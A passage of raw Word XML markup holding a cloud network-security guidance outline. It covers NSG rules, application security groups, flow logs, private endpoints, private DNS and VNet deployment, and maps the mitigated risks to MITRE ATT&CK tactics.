          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D40C14">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>destination addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0747159A" w14:textId="77777777" w:rsidR="005E43A5" w:rsidRDefault="005E43A5" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DAED42B" w14:textId="77777777" w:rsidR="00FD084F" w:rsidRPr="00FD084F" w:rsidRDefault="00FD084F" w:rsidP="002B27F1">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FDF7D0E" w14:textId="3A888D9A" w:rsidR="00FD084F" w:rsidRDefault="00FD084F" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD084F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Define explicit allow and deny rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49901001" w14:textId="00845257" w:rsidR="00FD084F" w:rsidRDefault="00FD084F" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD084F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>For well-defined applications (e.g., three-tier architectures), use the "deny by default, permit by exception" approach to create NSG rules</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC64F37" w14:textId="2A7BE2C0" w:rsidR="00FD084F" w:rsidRDefault="002D55CC" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D55CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>based on port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E176BC" w14:textId="25919D33" w:rsidR="002D55CC" w:rsidRDefault="002D55CC" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D55CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>based on src IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C19D9E1" w14:textId="7C844D71" w:rsidR="002D55CC" w:rsidRDefault="002D55CC" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D55CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>based on dst IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3D79B7" w14:textId="38B2AB2B" w:rsidR="006A6025" w:rsidRDefault="006A6025" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6025">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use application security groups for complex scenarios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8DFC46" w14:textId="23B0D685" w:rsidR="006A6025" w:rsidRDefault="006A6025" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A6025">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>When many applications and endpoints interact, simplify NSG rule management by using application security groups (ASGs) to group resources logically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE40D03" w14:textId="58E3F1AB" w:rsidR="006A6025" w:rsidRDefault="004E5327" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5327">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Monitor and optimize with flow logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1376A0FA" w14:textId="6128330E" w:rsidR="004E5327" w:rsidRPr="006A6025" w:rsidRDefault="004E5327" w:rsidP="002B27F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5327">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable virtual network flow logging to monitor traffic allowed or denied by NSG rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A75EA0" w14:textId="66B40C13" w:rsidR="00CE68AC" w:rsidRPr="004B606C" w:rsidRDefault="00CE68AC" w:rsidP="00226640">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="5040"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7481F135" w14:textId="64B65232" w:rsidR="00CE68AC" w:rsidRPr="00823F01" w:rsidRDefault="004B606C" w:rsidP="00314EE9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc236841621"/>
      <w:r w:rsidRPr="00823F01">
        <w:t>Secure network boundaries</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="4C4EBB17" w14:textId="1356913D" w:rsidR="004B606C" w:rsidRPr="00823F01" w:rsidRDefault="004B606C" w:rsidP="00575260">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc236841622"/>
      <w:r w:rsidRPr="00823F01">
        <w:t>NS-2: Secure cloud native services with network controls</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="38FBA287" w14:textId="47BA31DA" w:rsidR="00823F01" w:rsidRDefault="00823F01" w:rsidP="00823F01">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00823F01">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFEF6B3" w14:textId="0E3FC68A" w:rsidR="0045296C" w:rsidRDefault="0045296C" w:rsidP="000317FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0045296C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Establish private access points for resources to avoid the exposure of network traffic going through the public network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D52F31" w14:textId="2184A2E3" w:rsidR="0045296C" w:rsidRDefault="008C49EC" w:rsidP="000317FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C49EC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy the resource into virtual networks where you can restrict the VNet to establish a private access point for the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2416F723" w14:textId="79617954" w:rsidR="00F64BA8" w:rsidRDefault="00F64BA8" w:rsidP="00F64BA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F64BA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidRPr="00F64BA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590DD426" w14:textId="2A485F36" w:rsidR="00F64BA8" w:rsidRDefault="00F64BA8" w:rsidP="000317FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F64BA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Data exfiltration through public endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BDCEF0" w14:textId="08303334" w:rsidR="00F64BA8" w:rsidRDefault="00F64BA8" w:rsidP="000317FD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F64BA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Application-layer attacks against public endpoints</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633A3D31" w14:textId="6C84814D" w:rsidR="00F64BA8" w:rsidRDefault="00F64BA8" w:rsidP="002B67B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F64BA8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Man-in-the-middle attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497E2723" w14:textId="66248C5F" w:rsidR="00F64BA8" w:rsidRDefault="00A118F0" w:rsidP="00F64BA8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A118F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D935DBA" w14:textId="36DB1175" w:rsidR="00A118F0" w:rsidRDefault="00A118F0" w:rsidP="002B67B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A118F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E860B0D" w14:textId="3A411C9F" w:rsidR="00A118F0" w:rsidRDefault="00A118F0" w:rsidP="002B67B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A118F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6999CD21" w14:textId="53C97A28" w:rsidR="00A118F0" w:rsidRDefault="00A118F0" w:rsidP="002B67B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A118F0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F3B662" w14:textId="53369184" w:rsidR="00D36761" w:rsidRDefault="00C06689" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C06689">
        <w:t>NS-2.1: Use Private Link for service connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE57622" w14:textId="7A7D8FBA" w:rsidR="009727D5" w:rsidRDefault="009727D5" w:rsidP="00EF1D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009727D5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Implement private connectivity for cloud services </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A27195" w14:textId="7808B8A2" w:rsidR="009727D5" w:rsidRDefault="002A7973" w:rsidP="00EF1D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A7973">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Create private endpoints within your virtual network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6833AC22" w14:textId="0DBC604A" w:rsidR="000009DC" w:rsidRDefault="000009DC" w:rsidP="00EF1D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000009DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy private endpoints for supported services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BBDA81" w14:textId="73EFA5F6" w:rsidR="000009DC" w:rsidRDefault="000009DC" w:rsidP="002B67B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000009DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure private DNS zones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019F2BC9" w14:textId="5363E5C4" w:rsidR="000009DC" w:rsidRDefault="000009DC" w:rsidP="00EF1D99">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000009DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Create Azure Private DNS zones to override public DNS resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53498EEF" w14:textId="5BDFBB3D" w:rsidR="000009DC" w:rsidRDefault="006819DD" w:rsidP="002B67B0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006819DD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Disable public access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E5EC0D" w14:textId="15BBB1FC" w:rsidR="006819DD" w:rsidRDefault="006819DD" w:rsidP="00274644">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:ind w:left="2880"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006819DD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure service-level settings to disable public network access entirely once private endpoints are deployed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA0D324" w14:textId="7D8A3AB2" w:rsidR="00F30848" w:rsidRDefault="00F30848" w:rsidP="004F1930">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F30848">
        <w:t>NS-2.2: Deploy service into VNet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E44F60" w14:textId="67253C7A" w:rsidR="00E547DC" w:rsidRDefault="00E547DC" w:rsidP="00E547DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E547DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy services with VNet integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAC4A72" w14:textId="4C5ED7AF" w:rsidR="00E547DC" w:rsidRDefault="00E547DC" w:rsidP="008C74EB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E547DC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy services into virtual networks</w:t>
      </w:r>
      <w:r w:rsidR="009474BB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B55721F" w14:textId="3C2CF9A4" w:rsidR="009474BB" w:rsidRDefault="009474BB" w:rsidP="009474BB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="2970"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009474BB">
        <w:rPr>
